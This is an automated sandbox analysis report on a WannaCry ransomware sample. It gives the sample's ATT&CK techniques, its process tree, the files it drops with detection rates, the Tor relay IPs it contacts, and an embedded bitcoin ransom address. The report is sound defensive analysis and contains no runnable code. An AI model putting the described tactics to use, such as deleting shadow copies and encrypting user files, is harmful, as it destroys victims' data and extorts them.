              Source: C:\Users\user\Desktop\WannaCry.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome\~SDCD97.tmpJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information12
              Scripting
              Valid Accounts1
              Command and Scripting Interpreter
              12
              Scripting
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              OS Credential Dumping
              2
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              2
              Encrypted Channel
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              111
              Process Injection
              1
              File Deletion
              LSASS Memory13
              System Information Discovery
              Remote Desktop Protocol1
              Browser Session Hijacking
              1
              Non-Standard Port
              Exfiltration Over Bluetooth1
              Inhibit System Recovery
              Email AddressesDNS ServerDomain AccountsAt1
              Browser Extensions
              1
              Registry Run Keys / Startup Folder
              111
              Masquerading
              Security Account Manager11
              Security Software Discovery
              SMB/Windows Admin Shares1
              Data from Local System
              2
              Multi-hop Proxy
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Registry Run Keys / Startup Folder
              1
              Services File Permissions Weakness
              1
              Modify Registry
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture1
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchd1
              Services File Permissions Weakness
              Network Logon Script21
              Virtualization/Sandbox Evasion
              LSA Secrets21
              Virtualization/Sandbox Evasion
              SSHKeylogging2
              Proxy
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
              Process Injection
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Hidden Files and Directories
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Services File Permissions Weakness
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Rundll32
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1525431 Sample: WannaCry.bin.zip Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 88 Malicious sample detected (through community Yara rule) 2->88 90 Antivirus detection for dropped file 2->90 92 Multi AV Scanner detection for dropped file 2->92 94 5 other signatures 2->94 9 WannaCry.exe 1 1001 2->9         started        13 7zG.exe 1 2->13         started        15 rundll32.exe 2->15         started        process3 file4 68 C:\Users\user\Downloads\@WanaDecryptor@.exe, PE32 9->68 dropped 70 C:\Users\user\Documents\@WanaDecryptor@.exe, PE32 9->70 dropped 72 C:\Users\user\Desktop\u.wnry, PE32 9->72 dropped 76 238 other malicious files 9->76 dropped 120 Creates files in the recycle bin to hide itself 9->120 122 Drops PE files to the document folder of the user 9->122 124 Moves itself to temp directory 9->124 126 7 other signatures 9->126 17 @WanaDecryptor@.exe 9->17         started        22 cmd.exe 9->22         started        24 cmd.exe 9->24         started        26 176 other processes 9->26 74 C:\Users\user\Desktop\WannaCry.bin, PE32 13->74 dropped signatures5 process6 dnsIp7 80 127.0.0.1 unknown unknown 17->80 58 C:\Users\user\Desktop\TaskData\...\zlib1.dll, PE32 17->58 dropped 60 C:\Users\user\Desktop\TaskData\Tor\tor.exe, PE32 17->60 dropped 62 C:\Users\user\Desktop\...\taskhsvc.exe, PE32 17->62 dropped 66 7 other malicious files 17->66 dropped 96 Multi AV Scanner detection for dropped file 17->96 98 Installs TOR (Internet Anonymizer) 17->98 100 Found Tor onion address 17->100 110 2 other signatures 17->110 28 taskhsvc.exe 17->28         started        64 C:\Users\user\Desktop\m.vbs, ASCII 22->64 dropped 102 Command shell drops VBS files 22->102 104 Uses cmd line tools excessively to alter registry or file data 22->104 106 Deletes shadow drive data (may be related to ransomware) 22->106 31 cscript.exe 22->31         started        34 conhost.exe 22->34         started        36 @WanaDecryptor@.exe 24->36         started        39 conhost.exe 24->39         started        108 Writes to foreign memory regions 26->108 41 svchost.exe 26->41 injected 43 conhost.exe 26->43         started        45 conhost.exe 26->45         started        47 2 other processes 26->47 file8 signatures9 process10 dnsIp11 82 194.109.206.212, 443, 49719 XS4ALL-NLAmsterdamNL Netherlands 28->82 84 163.172.131.88, 443, 49721 OnlineSASFR United Kingdom 28->84 86 5 other IPs or domains 28->86 49 conhost.exe 28->49         started        78 C:\Users\user\...\@WanaDecryptor@.exe.lnk, MS 31->78 dropped 114 Found Tor onion address 36->114 116 Deletes shadow drive data (may be related to ransomware) 36->116 51 cmd.exe 36->51         started        118 Uses bcdedit to modify the Windows boot settings 41->118 file12 signatures13 process14 signatures15 112 Deletes shadow drive data (may be related to ransomware) 51->112 54 conhost.exe 51->54         started        56 WMIC.exe 51->56         started        process16

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\@WanaDecryptor@.exe.lnk100%AviraLNK/Runner.VPDJ
              C:\Users\user\Desktop\@WanaDecryptor@.exe97%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\Desktop\TaskData\Tor\libeay32.dll0%ReversingLabs
              C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll0%ReversingLabs
              C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll0%ReversingLabs
              C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll0%ReversingLabs
              C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll0%ReversingLabs
              C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll0%ReversingLabs
              C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll0%ReversingLabs
              C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe0%ReversingLabs
              C:\Users\user\Desktop\TaskData\Tor\tor.exe0%ReversingLabs
              C:\Users\user\Desktop\TaskData\Tor\zlib1.dll0%ReversingLabs
              C:\Users\user\Desktop\WannaCry.bin95%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\Desktop\taskdl.exe96%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\Desktop\taskse.exe89%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\Desktop\u.wnry97%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\Documents\@WanaDecryptor@.exe97%ReversingLabsWin32.Ransomware.WannaCry
              C:\Users\user\Downloads\@WanaDecryptor@.exe97%ReversingLabsWin32.Ransomware.WannaCry
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://www.openssl.org/support/faq.html0%URL Reputationsafe
              No contacted domains info
              NameSourceMaliciousAntivirus DetectionReputation
              http://www.btcfrog.com/qr/bitcoinPNG.php?address=%sWannaCry.exe, 0000000F.00000003.1474514530.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000004F.00000000.1576842950.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2328619800.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000052.00000002.2328607829.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000055.00000002.1589418005.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.1583977625.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005C.00000002.1584848304.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005F.00000002.1586153016.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000060.00000002.1587347770.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000063.00000002.1588770420.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000065.00000002.1590413504.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000068.00000002.1591580605.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000069.00000002.1593109838.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006A.00000002.1594769324.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006C.00000002.1596337196.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006E.00000002.1599571092.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006F.00000002.1600918230.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000070.00000002.1601807638.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000072.00000002.1603420323.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000074.00000002.1604662482.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000076.00000002.1605940913.0000000000421000.00000004.00000001.01000000.0000000B.sdmptrue
                unknown
                https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%staskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                  unknown
                  http://www.openssl.org/support/faq.htmlRANDtaskhsvc.exe, 00000073.00000002.2503773853.000000006C19D000.00000002.00000001.01000000.00000010.sdmp, libeay32.dll.79.drfalse
                    unknown
                    https://blog.torproject.org/blog/lifecycle-of-a-new-relayError@WanaDecryptor@.exe, 0000004F.00000003.1601937473.000000000275E000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                      unknown
                      http://www.btcfrog.com/qr/bitcoinPNG.php?address=115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn@WanaDecryptor@.exe, 00000052.00000002.2339486528.0000000000AD0000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://www.google.com/search?q=how@WanaDecryptor@.exe, 00000052.00000002.2339486528.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000055.00000002.1589418005.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.1583977625.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005C.00000002.1584848304.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005F.00000002.1586153016.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000060.00000002.1587347770.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000063.00000002.1588770420.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000065.00000002.1590413504.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000068.00000002.1591580605.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000069.00000002.1593109838.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006A.00000002.1594769324.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006C.00000002.1596337196.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006E.00000002.1599571092.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006F.00000002.1600918230.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000070.00000002.1601807638.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000072.00000002.1603420323.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000074.00000002.1604662482.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000076.00000002.1605940913.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000077.00000002.1607353552.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000007B.00000002.1608972570.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000007C.00000002.1610429686.0000000000421000.00000004.00000001.01000000.0000000B.sdmptrue
                          unknown
                          https://www.torproject.org/download/download#warningalphabetaThistaskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                            unknown
                            http://www.openssl.org/Vtaskhsvc.exe, 00000073.00000002.2506046937.000000006C21A000.00000008.00000001.01000000.00000010.sdmp, taskhsvc.exe, 00000073.00000002.2492523449.000000006BF7C000.00000008.00000001.01000000.00000013.sdmp, libeay32.dll.79.drfalse
                              unknown
                              http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=howWannaCry.exe, 0000000F.00000003.1474514530.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000004F.00000000.1576842950.000000000041F000.00000008.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000004F.00000002.2328619800.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000052.00000002.2328607829.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000055.00000002.1589418005.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.1583977625.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005C.00000002.1584848304.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000005F.00000002.1586153016.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000060.00000002.1587347770.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000063.00000002.1588770420.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000065.00000002.1590413504.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000068.00000002.1591580605.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000069.00000002.1593109838.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006A.00000002.1594769324.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006C.00000002.1596337196.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006E.00000002.1599571092.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 0000006F.00000002.1600918230.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000070.00000002.1601807638.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000072.00000002.1603420323.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000074.00000002.1604662482.0000000000421000.00000004.00000001.01000000.0000000B.sdmp, @WanaDecryptor@.exe, 00000076.00000002.1605940913.0000000000421000.00000004.00000001.01000000.0000000B.sdmptrue
                                unknown
                                http://www.zlib.net/D@WanaDecryptor@.exe, 0000004F.00000003.1601408389.0000000002911000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000002.2510812417.000000006E4E0000.00000008.00000001.01000000.00000011.sdmpfalse
                                  unknown
                                  https://sabotage.nettaskhsvc.exe, 00000073.00000003.2150784228.0000000003EB9000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000003.2128753931.000000000407A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000003.2139346119.00000000044B0000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000003.2131015386.00000000041EA000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000002.2349107247.0000000003130000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKStaskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                                      unknown
                                      https://www.torproject.org/documentation.htmltaskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                                        unknown
                                        https://www.torproject.org/download/download#warningtaskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                                          unknown
                                          https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$@WanaDecryptor@.exe, 0000004F.00000002.2327393102.0000000000198000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000055.00000002.1589306611.000000000019B000.00000004.00000010.00020000.00000000.sdmptrue
                                            unknown
                                            https://www.torproject.org/taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                                              unknown
                                              https://trac.torproject.org/8742taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                unknown
                                                http://freehaven.net/anonbib/#hs-attack06taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                  unknown
                                                  https://www.torproject.org/docs/faq.html#BestOSForRelaytaskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                    unknown
                                                    https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip@WanaDecryptor@.exe, 00000052.00000002.2327516450.000000000019B000.00000004.00000010.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000055.00000002.1589306611.000000000019B000.00000004.00000010.00020000.00000000.sdmptrue
                                                      unknown
                                                      http://www.openssl.org/support/faq.htmltaskhsvc.exe, 00000073.00000002.2503773853.000000006C19D000.00000002.00000001.01000000.00000010.sdmp, libeay32.dll.79.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://blog.torproject.org/blog/lifecycle-of-a-new-relay@WanaDecryptor@.exe, 0000004F.00000003.1601937473.000000000275E000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                        unknown
                                                        https://trac.torproject.org/projects/tor/ticket/14917.taskhsvc.exe, 00000073.00000000.1606594759.000000000052C000.00000002.00000001.01000000.0000000D.sdmpfalse
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          194.109.206.212
                                                          unknownNetherlands
                                                          3265XS4ALL-NLAmsterdamNLfalse
                                                          171.25.193.9
                                                          unknownSweden
                                                          198093DFRI-ASForeningenfordigitalafri-ochrattigheterSEfalse
                                                          163.172.131.88
                                                          unknownUnited Kingdom
                                                          12876OnlineSASFRfalse
                                                          51.254.246.203
                                                          unknownFrance
                                                          16276OVHFRfalse
                                                          37.187.7.74
                                                          unknownFrance
                                                          16276OVHFRfalse
                                                          185.32.222.237
                                                          unknownSwitzerland
                                                          51395AS-SOFTPLUSCHfalse
                                                          51.254.101.242
                                                          unknownFrance
                                                          16276OVHFRfalse
                                                          IP
                                                          127.0.0.1
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1525431
                                                          Start date and time:2024-10-04 08:42:09 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 51s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:210
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:WannaCry.bin.zip
                                                          Detection:MAL
                                                          Classification:mal100.rans.spyw.evad.winZIP@1855/1170@0/8
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .zip
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, VSSVC.exe, svchost.exe, TextInputHost.exe
                                                          • Excluded IPs from analysis (whitelisted): 2.23.209.150, 2.23.209.144, 2.23.209.141, 2.23.209.149, 2.23.209.143, 2.23.209.140, 2.23.209.193, 2.23.209.131, 2.23.209.130
                                                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, slscr.update.microsoft.com, evoke-windowsservices-tas.msedge.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          TimeTypeDescription
                                                          02:43:20API Interceptor1627463x Sleep call for process: WannaCry.exe modified
                                                          02:43:32API Interceptor2x Sleep call for process: @WanaDecryptor@.exe modified
                                                          02:43:34API Interceptor1x Sleep call for process: WMIC.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          194.109.206.21274Dhsai14R.exeGet hashmaliciousKronosBrowse
                                                          • 194.109.206.212/tor/status-vote/current/consensus
                                                          2bb0000.exeGet hashmaliciousUnknownBrowse
                                                          • 194.109.206.212/tor/status-vote/current/consensus
                                                          2f50000.exeGet hashmaliciousUnknownBrowse
                                                          • 194.109.206.212/tor/status-vote/current/consensus
                                                          6f0000.exeGet hashmaliciousUnknownBrowse
                                                          • 194.109.206.212/tor/status-vote/current/consensus
                                                          171.25.193.9R53a3ZJHBQ.exeGet hashmaliciousSystemBCBrowse
                                                          • 171.25.193.9/tor/status-vote/current/consensus
                                                          x3WX1kHqcx.exeGet hashmaliciousSystemBCBrowse
                                                          • 171.25.193.9/tor/status-vote/current/consensus
                                                          oGO7Hy4YCH.exeGet hashmaliciousSystemBCBrowse
                                                          • 171.25.193.9/tor/status-vote/current/consensus
                                                          SPXp2YHDFz.exeGet hashmaliciousUnknownBrowse
                                                          • 171.25.193.9/tor/status-vote/current/consensus
                                                          ILI1MGzcig.exeGet hashmaliciousUnknownBrowse
                                                          • 171.25.193.9/tor/status-vote/current/consensus
                                                          lwRhzjuYIg.exeGet hashmaliciousUnknownBrowse
                                                          • 171.25.193.9/tor/status-vote/current/consensus
                                                          OVrJ9mtD6Y.exeGet hashmaliciousTinyNukeBrowse
                                                          • 171.25.193.9/tor/status-vote/current/consensus
                                                          F75rJPKdGb.exeGet hashmaliciousKronosBrowse
                                                          • 171.25.193.9/tor/status-vote/current/consensus
                                                          ozJy5Zf5cf.exeGet hashmaliciousKronosBrowse
                                                          • 171.25.193.9/tor/status-vote/current/consensus
                                                          zfpLjnr5P9.exeGet hashmaliciousKronosBrowse
                                                          • 171.25.193.9/tor/status-vote/current/consensus
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          OnlineSASFRhttp://d-mj-hood-83.limesurvey.net/182116/Get hashmaliciousUnknownBrowse
                                                          • 51.158.227.154
                                                          file.exeGet hashmaliciousLummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5SystemzBrowse
                                                          • 195.154.173.35
                                                          SecuriteInfo.com.Trojan.Win32.Crypt.31282.17969.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 195.154.173.35
                                                          SecuriteInfo.com.Gen.Heur.Munp.1.11072.7602.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 195.154.173.35
                                                          report_209.pdfGet hashmaliciousUnknownBrowse
                                                          • 62.210.196.157
                                                          g3V051umJf.htmlGet hashmaliciousUnknownBrowse
                                                          • 212.129.25.206
                                                          https://campaignjoinnow42.cloud/Get hashmaliciousUnknownBrowse
                                                          • 51.159.84.191
                                                          EvKSsyJozV.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 195.154.173.35
                                                          J2alzv5eSV.exeGet hashmaliciousSocks5SystemzBrowse
                                                          • 195.154.173.35
                                                          CSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                                                          • 195.154.173.35
                                                          XS4ALL-NLAmsterdamNLSecuriteInfo.com.Linux.Siggen.9999.30976.5557.elfGet hashmaliciousMiraiBrowse
                                                          • 80.126.125.91
                                                          Tsunami.arm.elfGet hashmaliciousMiraiBrowse
                                                          • 212.238.146.163
                                                          ZgBCG135hk.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 83.161.145.156
                                                          SecuriteInfo.com.Linux.Siggen.9999.5151.15671.elfGet hashmaliciousMiraiBrowse
                                                          • 82.161.216.48
                                                          wEplk8vCmJ.exeGet hashmaliciousUnknownBrowse
                                                          • 213.222.24.114
                                                          x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 83.68.16.53
                                                          firmware.armv7l.elfGet hashmaliciousUnknownBrowse
                                                          • 80.127.228.2
                                                          firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                          • 194.109.43.227
                                                          https://hashsuite.openwall.net/downloads/Hash_Suite_Free_3_7.zipGet hashmaliciousUnknownBrowse
                                                          • 193.110.157.245
                                                          firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                          • 82.93.63.107
                                                          DFRI-ASForeningenfordigitalafri-ochrattigheterSEfile.exeGet hashmaliciousQuasar, WhiteSnake StealerBrowse
                                                          • 171.25.193.9
                                                          17dDkWbjoz.exeGet hashmaliciousPureLog StealerBrowse
                                                          • 171.25.193.80
                                                          C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                                          • 171.25.193.9
                                                          Endermanch@NoMoreRansom.exeGet hashmaliciousTroldesh / Shade, Bdaejec, CryptOneBrowse
                                                          • 171.25.193.9
                                                          LisectAVT_2403002A_8.exeGet hashmaliciousCryptOneBrowse
                                                          • 171.25.193.9
                                                          A2G6pO40qG.exeGet hashmaliciousCMSBruteBrowse
                                                          • 171.25.193.9
                                                          jXBjxhHQgR.exeGet hashmaliciousCMSBruteBrowse
                                                          • 171.25.193.9
                                                          c8sDO7umrx.exeGet hashmaliciousCMSBruteBrowse
                                                          • 171.25.193.9
                                                          PHHOjspjmp.exeGet hashmaliciousCMSBruteBrowse
                                                          • 171.25.193.9
                                                          77system.vbsGet hashmaliciousXmrigBrowse
                                                          • 171.25.193.20
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Users\user\Desktop\@WanaDecryptor@.exef_000112Get hashmaliciousConti, WannacryBrowse
                                                            WannaCry_2.EXEGet hashmaliciousWannacryBrowse
                                                              ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeGet hashmaliciousWannacry, BdaejecBrowse
                                                                LisectAVT_2403002A_126.EXE.exeGet hashmaliciousWannacry, ContiBrowse
                                                                  LisectAVT_2403002A_126.EXE.exeGet hashmaliciousWannacryBrowse
                                                                    LisectAVT_2403002A_223.exeGet hashmaliciousWannacryBrowse
                                                                      https://github.com/limiteci/WannaCryGet hashmaliciousWannacryBrowse
